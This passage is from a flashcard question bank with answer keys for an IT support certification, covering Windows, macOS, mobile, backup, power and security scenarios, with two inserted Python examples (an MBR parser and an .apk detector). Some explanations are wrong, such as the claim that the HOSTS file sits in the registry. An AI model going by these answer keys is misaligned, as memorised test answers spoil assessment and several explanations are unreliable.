Jailbreaking removes the vendor’s operating system restrictions to give users greater control over the device. iOS jailbreaking is accomplished by booting the device with a patched kernel.

Rooting or gaining root access on an Android-based phone means gaining super user-level access over the device.

A bootleg app is a software that illegally copies or imitates a commercial product or brand. In this scenario, the teenager used a legitimate site.

46
Q

What group has complete privilege control over a system?

Standard

Power

Administrator

Guest user

A

Administrator

A member of the Administrators group can perform all management tasks and generally has full access to all files and other objects on the system.

The Guests group is present only for legacy reasons. It has the same default rights and permissions as the Users group.

A standard account is a member of the Users group. This group is generally only able to configure settings for its own profile.

The Power Users group is present only to support legacy applications. It has the same permissions as the standard Users group.

47
Q

A user likes to watch Netflix on their phone while on the treadmill. The user turns the phone sideways for better viewing, but this time, the picture did not orient to landscape as it always has. Which of the following could cause this issue?

Screen lock is disabled.

Rotation lock is enabled.

Screen lock is enabled.

Rotation lock is disabled.

A

Rotation lock is enabled.

When a screen does not autorotate, it could be that the rotation lock is enabled. In iOS, the rotation lock is found in the Control Center. In Android, the rotation lock is found in the navigation bar.

If the rotation lock is disabled, the screen should autorotate. If it does not, the problem is probably hardware-related.

Screen lock is a security feature for mobile devices. If enabled, it activates after a period of inactivity or when the user triggers it. Most devices require a PIN or password to unlock the screen.

If screen lock is disabled, no PIN or password is required; generally a swipe gesture will unlock the screen. Neither setting affects screen rotation.

48
Q

A user calls the help desk complaining that Windows freezes to a blue screen every time it tries to boot. When the technician arrives, they boot the computer in Safe Mode. After evaluating this situation, what is the BEST reason the technician wants to enter Safe Mode to begin troubleshooting?

Safe Mode is necessary for troubleshooting.

CHKDSK can be run in Safe Mode.

Antivirus scans can be run in Safe Mode.

Safe Mode loads only the minimum amount of drivers and services to start the system.

A

Safe Mode loads only the minimum amount of drivers and services to start the system.

By using only essential drivers and services to boot, Safe Mode can boot the computer when a normal boot fails, as in this scenario.

A blue screen of death (BSoD) at startup is most often caused by faulty hardware or a bad driver. CHKDSK scans the drive to find and repair errors and, like many other analysis and recovery tools, can be run in Safe Mode; but that is a consequence of Safe Mode booting, not the reason to choose it.

Safe Mode also allows antivirus scans to run in an environment where most malware does not load, which again is a benefit of the minimal boot rather than the reason it is needed here.

While Safe Mode provides a favorable environment for troubleshooting, it is not required to use the many troubleshooting tools available in Windows, such as Task Manager, Resource Monitor, and Device Manager.

49
Q

What is referred to as data on persistent storage like HDDs, SSDs, and thumb drives?

Data-at-rest encryption

Use timeout/screen lock

Disable Autoplay

Disable AutoRun

A

Data-at-rest encryption

Data on persistent storage, like HDDs, SSDs, and thumb drives, is known as data-at-rest. To protect data-at-rest against theft or loss of the drive, the information stored on it can be encrypted (for example, with BitLocker on Windows or FileVault on macOS).

Disabling AutoRun prevents software, including malware, from being launched automatically by an autorun.inf file when an optical disc is inserted or a USB drive is attached.

Disabling AutoPlay stops the computer from automatically opening or playing newly inserted media.

A timeout/screen lock locks the desktop when the system detects no input activity for a set period. Users should not rely on this alone and should lock the computer manually when leaving it unattended.

50
Q

A security administrator for a defense contracting company wants to disable external devices. The administrator pushes out a group policy setting to disable such devices but worries that attackers might elevate privileges and reenable them. What other setting will help the administrator accomplish the objective?

Modern standby

Selective suspend

Fast startup

Hibernate

A

Selective suspend

The administrator can enable Universal Serial Bus (USB) selective suspend to turn off power to peripheral devices.

The fast startup uses the hibernation file to instantly restore the previous system RAM contents and make the computer ready for input more quickly than the traditional hibernate option.

Hibernate mode suspends to disk. It saves the contents of RAM (including open but unsaved file data) to disk as hiberfil.sys in the root of the boot volume and then turns the computer off; this is also referred to as ACPI state S4.

Modern standby utilizes a device’s ability to function in an S0 low-power idle mode to maintain network connectivity without consuming too much energy.

51
Q

A marketing professional normally sends large files to other team members. The IT department recommended using a shared drive and assisted them in setting it up. The project was a very high priority, so the professional collaborated with several members but started receiving reports that some users could not access it sometimes and others could. They eventually figured out that only 20 people at a time seemed to be able to access it. What is causing the issue?

DNS settings are intermittent.

The file server was not properly configured.

The proxy settings are not properly configured on client machines.

The share was created on a Windows desktop.

A

The share was created on a Windows desktop.

The Share tab in the folder’s Properties dialog can customize permissions, change the share name, and limit the number of simultaneous connections. Windows desktop versions are limited to 20 inbound connections.

If more than 20 users access the share, the data should be stored on file servers rather than local client computers.

The proxy settings will not affect users’ ability to access the file share in this scenario. It could cause issues accessing the internet, however.

If the domain name system (DNS) were causing an issue, the users would not be limited to 20 people. It is possible that load-balanced DNS servers could cause issues if one is incorrect.

52
Q

A server administrator was called in to help a VIP whose computer was accidentally infected with a virus. The administrator wants to revert the computer but still preserve user personalization settings. What should the administrator use?

Factory partition

Refresh

Reset

Third-party drivers

A

Refresh

Windows supports refresh and reset options to try to repair the installation. Using refresh recopies the system files and reverts most system settings to the default but can preserve user personalization settings, data files, and more.

Using the full reset option deletes the existing OS plus apps, settings, and data ready for the OS to be reinstalled.

A factory recovery partition is a tool used by the original equipment manufacturers (OEMs) to restore the OS environment to its ship state. The recovery partition is created on the internal fixed drive.

Third-party drivers are needed when the OS setup media does not contain drivers for certain hardware devices; they can be supplied through an unattended installation file, but they do not address reverting an infected installation.

53
Q

A client uses this software that allows access to a given computer. What is this software?

Desktop management

Videoconferencing

Screen-sharing

File transfer

A

Screen-sharing

Screen-sharing is software that is designed to work over HTTPS across the internet. This is secure because the connection is encrypted but also easier to implement as it does not require special firewall rules.

Some web-conferencing and videoconferencing software, like Microsoft Teams and Zoom, includes a screen-sharing feature, and some also allow participants to be granted control of the shared screen.

With file transfer, users can choose a file-sharing protocol that can be used across all connected hosts. It allows configuring permissions on the share and provisioning user accounts that are recognized by both the server and client.

Desktop management suites are designed for deployment by a single organization and focus primarily on access control and authorization.

54
Q

A client administrator sets up a new system for GUID partition table (GPT) partitioning. What dependency will the administrator need to set?

BIOS

MBR

TPM 2.0

UEFI

A

UEFI

When the disk uses GPT partitioning, the system firmware must be set to use the Unified Extensible Firmware Interface (UEFI) boot method.

The disk will not be recognized as a boot device if the firmware is set to the legacy BIOS (compatibility) boot method.

While the scenario did not specify which OS the administrator was installing, Windows 11 requires a CPU or motherboard supporting trusted platform module (TPM) version 2.0; TPM is not, however, a dependency of GPT partitioning.

The master boot record (MBR) partition style stores a partition table in the first 512-byte sector of the disk and is used with legacy BIOS boot; it is the alternative to GPT, not a dependency of it.
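How the two partition styles look on disk, as an added Python example that is not part of the original flashcard: it constructs a 512-byte MBR sector, parses the four 16-byte partition entries and the 0x55AA boot signature, and tells a real MBR table apart from the protective MBR (type 0xEE) that a GPT disk carries so that legacy tools do not overwrite it. The sample sectors are constructed here; the partition type names are the commonly used ones for those IDs.

```python
import struct

SECTOR_SIZE = 512
TABLE_OFFSET = 446          # four 16-byte entries occupy bytes 446..509
SIGNATURE_OFFSET = 510      # 0x55 0xAA at bytes 510..511
BOOT_SIGNATURE = 0xAA55     # those two bytes read as a little-endian uint16
GPT_PROTECTIVE = 0xEE
ENTRY_FORMAT = "<B3sB3sII"  # status, CHS start, type, CHS end, LBA start, sector count

# Partition type IDs with their commonly used names.
PARTITION_TYPES = {
    0x05: "Extended", 0x07: "NTFS/exFAT", 0x0B: "FAT32 (CHS)", 0x0C: "FAT32 (LBA)",
    0x0F: "Extended (LBA)", 0x83: "Linux", 0xEE: "GPT protective",
}

# Largest capacity a 32-bit LBA can address with 512-byte sectors: 2 TiB.
MBR_MAX_BYTES = 2 ** 32 * SECTOR_SIZE


def build_mbr(entries):
    """Construct a sector from up to four (bootable, type_id, lba_start, sector_count)
    tuples. Used only to create sample input; the boot-code area is left zeroed."""
    if len(entries) > 4:
        raise ValueError("an MBR holds at most four primary partition entries")
    sector = bytearray(SECTOR_SIZE)
    for i, (bootable, type_id, lba_start, count) in enumerate(entries):
        struct.pack_into(ENTRY_FORMAT, sector, TABLE_OFFSET + 16 * i,
                         0x80 if bootable else 0x00, b"\xff\xff\xff",
                         type_id, b"\xff\xff\xff", lba_start, count)
    struct.pack_into("<H", sector, SIGNATURE_OFFSET, BOOT_SIGNATURE)
    return bytes(sector)


def parse_mbr(sector):
    """Return the non-empty partition entries of a 512-byte MBR sector.
    Raises ValueError if the sector is the wrong size or lacks the 0x55AA signature."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError(f"expected {SECTOR_SIZE} bytes, got {len(sector)}")
    (signature,) = struct.unpack_from("<H", sector, SIGNATURE_OFFSET)
    if signature != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature; not a valid MBR")
    entries = []
    for i in range(4):
        status, _, type_id, _, lba_start, count = struct.unpack_from(
            ENTRY_FORMAT, sector, TABLE_OFFSET + 16 * i)
        if type_id == 0x00:          # unused slot
            continue
        entries.append({
            "index": i,
            "bootable": status == 0x80,
            "type_id": type_id,
            "type": PARTITION_TYPES.get(type_id, "unknown"),
            "lba_start": lba_start,
            "sectors": count,
        })
    return entries


def is_valid_mbr(sector):
    try:
        parse_mbr(sector)
        return True
    except ValueError:
        return False


def partition_style(sector):
    """'GPT' if the sector is a protective MBR (type 0xEE), 'MBR' for a real
    MBR table, 'empty' when no partitions are defined."""
    entries = parse_mbr(sector)
    if not entries:
        return "empty"
    if any(e["type_id"] == GPT_PROTECTIVE for e in entries):
        return "GPT"
    return "MBR"


# Constructed samples: a legacy disk with one bootable NTFS partition, and the
# protective MBR a GPT disk carries (a single 0xEE entry from LBA 1 to end of disk).
LEGACY_DISK = build_mbr([(True, 0x07, 2048, 1_048_576)])
GPT_DISK = build_mbr([(False, GPT_PROTECTIVE, 1, 0xFFFFFFFF)])

if __name__ == "__main__":
    for name, sector in (("legacy", LEGACY_DISK), ("gpt", GPT_DISK)):
        print(name, partition_style(sector), parse_mbr(sector))
```

On a real system the same parse can be run over the first 512 bytes read from the raw disk device; a GPT disk answers "GPT" from its protective entry, and the actual partition layout then has to be read from the GPT header at LBA 1 rather than from this sector.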

55
Q

An endpoint machine administrator configures specific Apple computers designated for users with disability. Where should the administrator look to configure these settings?

Mission Control

Time Machine

Accessibility

Security & Privacy

A

Accessibility

The Accessibility preference pane is used to configure assistive vision and sound options, such as VoiceOver narration of screen elements, cursor size and motion settings, zoom tools, display contrast, font sizes, and captioning.

macOS has options to configure what analytics/telemetry data and personalized information can be collected. Users can adjust these options via the Security & Privacy preference pane.

The Time Machine preference pane backs data up to an external drive or partition formatted with either the Apple File System (APFS) or the older Mac OS Extended (HFS+) file system.

The Mission Control feature is used for window management and enables users to set up multiple desktops.

56
Q

A user is using AirDrop to send information to another device. What type of software is this?

Videoconferencing

File transfer

Screen-sharing

Desktop management

A

File transfer

File transfer allows users to select a file-sharing protocol that all the connecting hosts can use. Using this, both the server and client can configure permissions on the shared folders and provision user accounts.

Videoconferencing or web-conferencing software, such as Microsoft Teams or Zoom, includes a screen-share client, and some also allow participants to be granted control of the share.

Screen-sharing is software designed to work over HTTPS across the internet; this is secure because the connection is encrypted and easier to implement as it does not require special firewall rules.

Desktop management suites are designed for deployment by a single organization and focus primarily on access control and authorization.

57
Q

A vulnerability manager is brainstorming ways to enhance security for the company’s cell phones. The company uses only Apple devices, so one idea is to look for anomalous files that do not belong on Apple devices, as a sign of malware that was sent out indiscriminately without profiling the target, in the hope that the operating system would match. Which of the following would be anomalous?

.pkg

.apk

.dmg

.app

A

.apk

An .apk file is the installer package format for Android, not for any Apple platform, so finding one in an Apple-only environment is anomalous. On Android, enabling unknown sources allows untrusted apps downloaded from a website to be installed from an .apk file.

DMG (disk image) format is used for simple installs where the package contents need to be copied to the Applications folder.

PKG format is used where app setup needs to perform additional actions, such as running a service or writing files to multiple folders.

Once installed, a macOS app is stored as a bundle directory with the .app extension in the Applications folder.
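Looking for files that do not belong on an Apple fleet, as an added Python example that is not part of the original flashcard: it flags files by extension and, independently, identifies an Android package by its contents (a zip archive containing AndroidManifest.xml and a .dex file), so an .apk renamed to .pkg is still caught. The sample files are constructed here, and the .ipa (iOS app archive) entry in the allowed-extension set is an addition, not from the page.

```python
import io
import os
import zipfile
from typing import Dict, List

# Extensions expected on Apple platforms: .pkg, .dmg and .app from the card above,
# plus .ipa (iOS app archive), which is an addition in this example.
APPLE_EXTENSIONS = {".pkg", ".dmg", ".app", ".ipa"}
ZIP_MAGIC = b"PK\x03\x04"


def build_sample_apk() -> bytes:
    """Constructed stand-in for an Android package: a zip whose members have the
    names every real APK carries. The contents are placeholders, not real code."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"placeholder (real APKs use binary XML)")
        z.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 16)
        z.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
    return buf.getvalue()


def build_sample_pkg() -> bytes:
    """Constructed stand-in for a macOS flat package: starts with the 'xar!' magic
    that real .pkg archives use; the rest is filler."""
    return b"xar!" + b"\x00" * 60


def looks_like_apk(data: bytes) -> bool:
    """Identify an APK by its contents rather than its name: a zip archive that
    contains AndroidManifest.xml and at least one Dalvik .dex file."""
    if not data.startswith(ZIP_MAGIC):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            names = z.namelist()
    except zipfile.BadZipFile:
        return False
    return "AndroidManifest.xml" in names and any(n.endswith(".dex") for n in names)


def classify_file(name: str, data: bytes) -> List[str]:
    """Return the reasons a file is anomalous on an Apple-only fleet (an empty list
    means nothing suspicious). Extension and content are checked independently,
    so an APK renamed to .pkg is still caught."""
    reasons = []
    ext = os.path.splitext(name)[1].lower()
    if ext == ".apk":
        reasons.append("Android package extension")
    elif ext not in APPLE_EXTENSIONS:
        reasons.append(f"unexpected extension {ext!r}")
    if looks_like_apk(data):
        reasons.append("zip contents match an Android package")
    return reasons


def scan_inventory(files: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Run classify_file over a name -> bytes mapping and keep only the hits."""
    hits = {name: classify_file(name, data) for name, data in files.items()}
    return {name: reasons for name, reasons in hits.items() if reasons}


# Constructed inventory: an honest installer, an honest APK, an APK disguised with
# an Apple-looking extension, and an unrelated stray file.
SAMPLE_FILES = {
    "Installer.pkg": build_sample_pkg(),
    "game.apk": build_sample_apk(),
    "Update.pkg": build_sample_apk(),
    "notes.txt": b"just text",
}

if __name__ == "__main__":
    for name, reasons in scan_inventory(SAMPLE_FILES).items():
        print(f"{name}: {'; '.join(reasons)}")
```

The content check matters more than the extension check: an attacker who bothers to rename the payload defeats the extension rule, while the zip members are what the Android package installer actually needs and so cannot be removed.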

58
Q

A user experiences issues searching their local computer for files. What is a common issue that the user should check?

User accounts

Hide extensions

Show hidden files

Indexing options

A

Indexing options

Windows Search is governed by settings configured in the Indexing Options applet. A corrupted index is a common cause of search problems, and rebuilding the index from that applet usually fixes them.

A user account controls access to the computer. Each account can be assigned rights or privileges to make OS configuration changes. Accounts can also be assigned permissions on files, folders, and printers.

A file or folder can be marked as “Hidden” through its file attributes. Files marked as hidden are not shown by default but can be revealed by setting the “Show hidden files, folders, and drives” option.

“Hide protected operating system files” hides files marked with the System attribute. “Hide extensions for known file types” hides file extensions in Explorer; it does not affect search, but it can disguise a malicious executable named, say, invoice.pdf.exe as invoice.pdf.

59
Q

A helpdesk professional assists a user with issues booting up their Mac computer. The user reports that there is no drive to boot from. Where will the computer boot from?

Force Quit

Terminal

Web

FileVault

A

Web

When a Mac is restarted and the startup drive is not available for any reason, if the computer is connected to the internet it will try to boot from a web-based drive (macOS Internet Recovery) so that the system can be diagnosed or reinstalled.

The Terminal can be used to access the command-line environment, which uses either the Z shell (zsh) or Bash. Older macOS versions use Bash, while zsh is the default from Catalina up.

If a macOS app stops responding, it should be possible to close it down and restart it without restarting the computer, by using Force Quit from the Apple menu or pressing COMMAND+OPTION+ESC.

FileVault is a disk encryption product. Encryption protects the data stored on a disk against the possibility that a threat actor could remove it.

60
Q

A transportation company wants to set up software that gathers statistics from the controller area network for trailers hauling loads, enabling them to adjust processes to optimize cost savings. What type of adapter will the company need to send the statistics back to their cloud network?

Wired

Wireless

WWAN

VPN

A

WWAN

Wireless Wide Area Network (WWAN) uses a cellular adapter to connect to the internet via a provider’s network. These networks are typically metered with a set data limit.

A virtual private network (VPN) connects the components and resources of two (private) networks over another (public) network.

Almost all wired network connections are based on some form of Ethernet. The adapter’s media type must match the switch it is connected to, which is impractical for a trailer on the road.

While WWAN is technically wireless, “wireless” in this context generally refers to Wi-Fi, which connects a device in the 2.4 or 5 GHz bands over a limited physical range that a moving trailer would quickly leave.

61
Q

While researching and writing a paper on their home computer, a student notices an alert in the notification area that Windows Defender has expired and needs to be updated. The student is annoyed by the interruption but clicks on the alert and follows the update instructions. Later, the student told their parents that Defender expired, and they installed the update. The student’s parents are panic-stricken. Determine the best reason for the parents’ reaction from the information provided.

The parents know the Windows Defender subscription was recently renewed.

The parents have scheduled all updates to occur during the automatic maintenance window at 2:00am.

A malicious browser push notification tricked the student into a drive-by download.

A malicious browser push notification tricked the student into downloading malware.

A

A malicious browser push notification tricked the student into downloading malware.

One way to infect a host with malware is to misuse the browser push notification system that allows a website to send messages. Often these messages are designed to trick users into installing malware by disguising it as an antivirus update.

While this scenario describes a malicious browser push notification, it is not a drive-by download. In a drive-by attack, the computer is infected with malware simply by visiting a malicious site; there is no user installation.

Defender is a Windows built-in antivirus and firewall product, so it does not expire. Scheduled updates are irrelevant.

Defender has no subscription to be renewed because it is built into Windows (Windows Defender has been a full antivirus since Windows 8; earlier versions shipped it as an antispyware tool).

62
Q

Which of the following contains information about ingredients, health hazards, precautions, and first aid information and what to do if the material is spilled or leaks?

MSDS

Surge suppressor device

Proper power handling

Electrical fire safety

A

MSDS

A material safety data sheet (MSDS) includes information about recycling any waste product or disposing of it safely by government regulations.

Electrical fire safety ensures that equipment is properly stored and away from any flammable material and electrical wires do not start a fire.

Surge suppressor devices come in the form of adapters, trailing sockets, or filter plugs, with the protection circuitry built into the unit. These devices offer low-cost protection to one or two pieces of equipment.

Proper power handling is done with the correct training. PC power supply units can carry dangerously high levels of voltage. Disconnection of power should be done before repairing a PC.

63
Q

A user receives an unsolicited call from a Microsoft support technician during a normal workday. The technician says the antivirus software on the user’s computer alerted Microsoft of a new malware infection. The technician needs to remote into the user’s computer to fix the problem. What is the technician trying to do?

Address the problem faster with a call rather than a pop-up notification alert.

Proactively respond to a virus alert.

Circumvent security software.

Address the problem faster with a call rather than an email.

A

Circumvent security software.

Microsoft does not directly support users in this way and would never make an unsolicited call about a malware alert. This is a tech-support scam: the goal is to get remote access to the computer, bypass its security software, and then steal credentials or money.

Microsoft would not receive a malware alert from a user’s computer because the company does not directly support users, and it would not contact a user about one.

Microsoft does not directly support users and does not receive malware alerts about them, and the company neither calls nor emails users about such alerts.

Microsoft does not call users and would not receive an antivirus alert that would cause the company to generate a notification.

64
Q

When making major adjustments to a project, a security technician will have to assess the business and technical merits as well as the risks of the adjustment plan. What documentation will need to be submitted?

Sandbox testing

Risk levels

Change board approval

Rollback plan

A

Change board approval

Change board approval means that a significant change request is submitted to a change advisory board (CAB). The CAB should include stakeholders for the departments, users, or customers the change will impact, those proposing it, the technicians responsible for implementing it, and the managers or directors who can authorize the budget.

Sandbox testing uses a computing environment that replicates the production environment but is isolated from it.

A rollback plan documents how a change can be reversed if it has harmful or unforeseen consequences.

Risk levels are part of the risk assessment and can be expressed as a discrete value or as a traffic-light indicator, where red is high risk, orange is moderate risk, and green is minimal risk.

65
Q

A security administrator moves their proxy from on-premises to the cloud and wants to establish a client tunnel to the cloud proxy for web traffic. This way, the users are protected even while out in public and not connected to the domain. What should the administrator set up?

Mapped drive

DNS settings

WWAN

VPN

A

VPN

A virtual private network (VPN) connects the components and resources of two (private) networks over another (public) network.

Wireless Wide Area Network (WWAN) uses a cellular adapter to connect to the internet via a provider’s network. These networks are typically metered with a set data limit.

A mapped drive is a share that has been assigned to a drive letter on a client device. To map a share as a drive, right-click it and select Map Network Drive.

While it is best practice to configure DNS settings to resolve the VPN concentrator, technically, it could be done with an IP.

66
Q

Which of the following devices come in the form of adapters, trailing sockets, or filter plugs, with the protection circuitry built into the unit?

Compressed air blaster

Anti-ESD strap

Surge suppressor

Antistatic bags

A

Surge suppressor

Surge suppressors are passive protection devices that can filter out the effects of surges and spikes.

A compressed air blaster can be used to dislodge dust from difficult-to-reach areas. When performing this sort of maintenance within a controlled area, wear an appropriate air-filter mask and goggles.

Antistatic bags are packages that reduce the risk of ESD because they are coated with a conductive material.

Anti-ESD wrist straps should fit snugly around the wrist or ankle so that the metal stud makes contact with the skin. Wearing an anti-ESD wrist strap causes the static charge to dissipate more effectively.

67
Q

A company has experienced a power outage, but activation of an alternative source has kicked in. What is this alternative source called?

Fuse

Surge suppressor

Voltage

UPS

A

UPS

An uninterruptible power supply (UPS) will provide a temporary power source in the event of complete power loss. An alternate power source can range from a backup battery to a generator.

Surge suppressors are passive protection devices that can filter out the effects of surges and spikes. These devices offer low-cost protection to one or two pieces of equipment.

An electrical device has a fuse appropriate to its maximum current. If the current increases past the fuse capacity, the fuse will blow. However, if the fuse fitted is rated too low, the fuse will blow too easily.

Voltage is the potential difference between two points measured in volts (V).

68
Q

A technician detected and reported an incident, resulting in the appropriate unit being notified and tasked with acting as first responders, taking charge of the situation, and formulating the appropriate response. What is this unit called?

CSIRT

Chain of custody

Open-source

IRP

A

CSIRT

The computer security incident response team (CSIRT) is used in some larger organizations to provide a range of decision-making and technical skills required to deal with different types of incidents.

An open-source license makes software free to use, modify, and share, and makes the program code used to design it available.

An incident response plan (IRP) sets the procedures and guidelines that an IT team must adopt to deal with security incidents.

A chain of custody form records who collected the evidence, who has handled it subsequently, where they stored it, and must show access to the evidence at every point.

69
Q

An installer is implemented using an .EXE file. What is this technique performing?

Gathering of information

Initiating updates

Introducing malware

Installation of applications

A

Installation of applications

Installation of applications is used in Windows as a setup file that can be executed in silent mode using the command switches for its installer. In Linux, scripts are often used to compile apps from source code.

In Windows PowerShell, hundreds of Get-verb cmdlets gather information/data from a Windows subsystem. Bash supports numerous commands to manipulate text.

The initiation of updates takes place through wusa.exe in Windows, which processes batch files to initiate a typical update. The PSWindowsUpdate module in PowerShell contains numerous cmdlets. Users can use apt-get/apt or yum from a Bash script in Linux.

70
Q

A technician helps a customer with a ticket request and needs to record that the customer has accepted that the ticket can be closed. Which of the following fields reflects this part of the ticket life cycle?

Progress notes

Escalation levels

Problem description

Problem resolution

A

Problem resolution

Problem resolution sets out the plan of action and documents the successful implementation and testing of the plan and full system functionality.

Problem description records the initial request with any detail that could easily be collected at the time.

Progress notes record what diagnostic tools and processes have been discovered and identify and confirm a probable cause.

Escalation levels occur when an agent cannot resolve the ticket. The support team can be organized into tiers to clarify the escalation levels. The ticket owner is the person responsible for managing the ticket.

71
Q

An employee enters the web address of their local newspaper to check for news on the company, and a site pops up with many click-bait celebrity stories. The employee re-enters the address assuming a misspelling but returns to the same page. When the help desk technician arrives, which of the following troubleshooting steps would be appropriate?

Check to see if the DNS browser is configured correctly.

Check HOSTS files for malicious entries.

Check the System Configuration Utility.

Check to see if the newspaper website’s certificate is expired.

A

Check HOSTS files for malicious entries

This scenario describes a redirection when a user tries to open one page but is sent to another. Here, it appears adware is driving traffic to another site to increase clicks. Since HOSTS maps domain names to IP addresses, the HOSTS file in the registry would show malicious entries to re-route IP addresses.

The Domain Name Server (DNS) is a server, not a browser. However, the nslookup command can be used to check DNS records.

Any problem with a website’s certificate will likely generate a message. It will not send a user to another website.

The System Configuration Utility modifies various settings and files that affect how the computer boots and loads Windows.

72
Q

An administrator uses an access control system to shuttle authentication and authorization traffic between the supplicant and the AAA server, one that encrypts the entire authentication exchange rather than just the password. What is this method?

Kerberos

AES

TACACS+

RADIUS

A

TACACS+

Terminal access control system plus (TACACS+) is one way of implementing authentication, authorization, and accounting (AAA). TACACS+ is often used in authenticating administrative access to routers, switches, and access points.

Remote authentication dial-in user service (RADIUS) is one way of implementing the AAA server when configuring enterprise authentication. Rather than storing and validating user credentials directly, the access point forwards data between the RADIUS server and the supplicant without reading it.

Kerberos allows a user account to authenticate to a domain controller (DC) over a trusted local cabled segment. Kerberos facilitates single sign-on (SSO).

Advanced encryption standard (AES) is the standard encryption used by WPA2 and the strongest encryption standard to use by Wi-Fi.

73
Q

What method gets a system back up and running before the recommended amount of time elapses?

Sandbox testing

Change board approval

Rollback plan

Risk levels

A

Rollback plan

A rollback plan is when a change can be reversed if it has harmful or unforeseen consequences.

Change board approvals are when a serious change request is made, and approvals go to a change advisory board (CAB). The CAB should include stakeholders for departments, users, or customers whom the change will impact and those proposing it, technicians responsible for implementing it, and managers/directors who can authorize the budget.

Sandbox testing is a computing environment designed to replicate the production environment but isolated from it.

Risk levels are included in the risk assignment that could be expressed as a discrete value or as a traffic light-type of indicator, where red is high, orange is moderate risk, and green is minimal risk.

74
Q

A 3D animations expert is searching for a new computer. What should they ensure it has to handle their demanding software?

Integrated graphics card

Dedicated graphics card

64-bit CPU

Hardware token

A

Dedicated graphics card

A demanding application, such as graphic design software or a game, will likely require a dedicated graphics card with video RAM, separate from the general system RAM.

An integrated graphics card would not be enough to handle a demanding application such as graphic design software.

While a 64-bit CPU would probably help in this instance, a dedicated graphics card addresses the resource chokepoint for the 3D application.

An external hardware token is a smart card or USB form factor device that stores cryptographic user identification data. The user must present the token and supply a password, PIN, or fingerprint scan to authenticate.

75
Q

Which of the following can prevent, detect, and remove software threats that consist of ransomware, Trojans, spyware, and rootkits?

OS reinstallation

Security-awareness training

Recovery mode

Anti-malware

A

Anti-malware

Anti-malware is computer software used to avoid, identify, and eliminate malware. Anti-malware is like antivirus software but for more up-to-date malware.

Recovery mode is the step-by-step processing of manual removal to disable persistence mechanisms and reconfigure the system to its secure baseline.

OS reinstallation is when the antivirus software cannot recover data from infected files, and a user must complete a system restore.

Security-awareness training is usually delivered to employees at all levels, including end-users, technical staff, and executives. The training includes anti-phishing, software firewalls, passwords, malware threats, and more.

76
Q

A technician uses a backup method that reflects how much lost work can be tolerated. What is this method?

Frequency

Full with incremental

Full with differential

Retention

A

Frequency

Frequency is the period between backup jobs. If the edits are much more difficult to reconstruct, the backup frequency might need to be measured in hours, minutes, or seconds.

Retention is the period that any given backup job is kept for. Short-term retention is important for version control and for recovering from malware infection.

Full with incremental means that the chain starts with a full backup and then runs incremental jobs that select only new files and files modified since the previous job.

Full with differential means that the chain starts with a full backup and then runs differential jobs that select new files and files modified since the original full job.

77
Q

A technician runs an isolated test that allows them to run the program without impacting the system. What is this called?

Sandbox

Rollback plan

End-user acceptance

Affected systems

A

Sandbox

Sandbox testing is a computing environment designed to replicate the production environment but isolated from it.

End-user acceptance must be accounted for when a change of plan is implemented. It can be difficult for people to adapt to new processes and easy for them to magnify minor problems into major complaints.

A rollback plan is when a change can be reversed if it has harmful or unforeseen consequences.

Affected systems must be considered in the implementation of change. Companies should first attempt to test the change for the most significant or major changes.

78
Q

A technician needs to set up a method that blocks URLs or search terms using keywords and phrases. What is this method?

Encryption setting

Disable guest access

Changing channels

Content filtering

A

Content filtering

Content filtering means that the firewall downloads curated reputation databases that associate IP address ranges, Fully Qualified Domain Names (FQDNs), and URL web addresses with sites known to host various categories of content.

Changing channels can be accessed by using a Wi-Fi analyzer to identify which channel within the access point’s range is least congested.

Disable guest access when a user does not want a guest network. The guest network is usually isolated from the other local devices, and guests can connect to it and access the internet without a password.

Encryption settings allow users to set the authentication mode.

79
Q

Users are curious about what is run on startup, so they dig into the startup script. The users find the command “net use M: \\sharedrive\data /persistent:yes”. What is the startup script invoking?

Print share

Mapped drive

Proxy

File server

A

Mapped drive

A mapped drive is a share that has been assigned to a drive letter on a client device. To map a share as a drive, right-click it and select Map Network Drive.

A user may be mapping a file server, but mapped drives do not always exist on file servers. They could be on network-attached storage or shared directly from another client machine.

The user is not mapping a print share with this command, but printers can be shared through various means, such as a print server.

This command does not configure the proxy. The settings for proxy information can be found in internet options.

80
Q

A user performs a technique that allows them to connect their PlayStation to their network. What is this technique?

Screened subnet

UPnP

Static IP

Encryption setting

A

UPnP

The universal plug-and-play (UPnP) framework sends instructions to the firewall with the correct configuration parameters to allow applications to work.

A screened subnet establishes a more secure configuration. The idea of a screened subnet is that some hosts are placed in a separate network segment with a different IP subnet address range than the rest of the local area network (LAN).

A static IP can be auto-configured as a DHCP reservation, but if manual configuration is required, follow the service provider’s instructions to configure the correct address on the router’s Wide Area Network (WAN) interface.

Encryption settings allow users to set the authentication mode.

81
Q

What type of data breach can be associated with a specific person or use an anonymized or de-identified data set for analysis and research?

Personal government-issued information

Healthcare data

Open-source license

PII

A

Healthcare data

Healthcare data refers to medical and insurance records plus associated hospital and laboratory test results.

Personal government-issued information is issued to individuals by federal or state governments. Personal information may be social security numbers, passports, driving licenses, and birth/marriage certificates.

Personally identifiable information (PII) is data that can be used to identify, contact, locate an individual or, in the case of identity theft, impersonate that individual.

The open-source license makes it free to use, modify, and share and makes the program code used to design it available.

82
Q

Rooting is typically an action related to Android, while jailbreaking is associated with iOS. They are both trying to do the same thing. What is that?

Publish malicious apps.

Spoofing

Bootlegging

Gain unrestricted access.

A

Gain unrestricted access.

The goal of rooting and jailbreaking is to gain unrestricted access, or privilege escalation, by subverting the security controls built into iOS or Android. This also has the side effect of leaving many security measures permanently disabled.

Publishing malicious apps is the purview of rogue developers. It is not the goal of rooting and jailbreaking.

Bootlegging is developing software that illegally copies or imitates a commercial product or brand.

Spoofing is developing a malicious app that spoofs a legitimate app by using a similar name and fake reviews, and automated downloads to boost its apparent popularity.

83
Q

Worried about a crash, a user creates a complete backup of the system configuration and data files on their computer. Identify what the user has created.

An update rollback

A reimage

An image

An update

A

An image

A backup of everything on the computer, including the installation, settings, apps, and files, is also called an image.

Reimaging is not a backup. It removes system files and resets all PC settings to default, usually done when the hard disk or operating system is damaged or malware-infected.

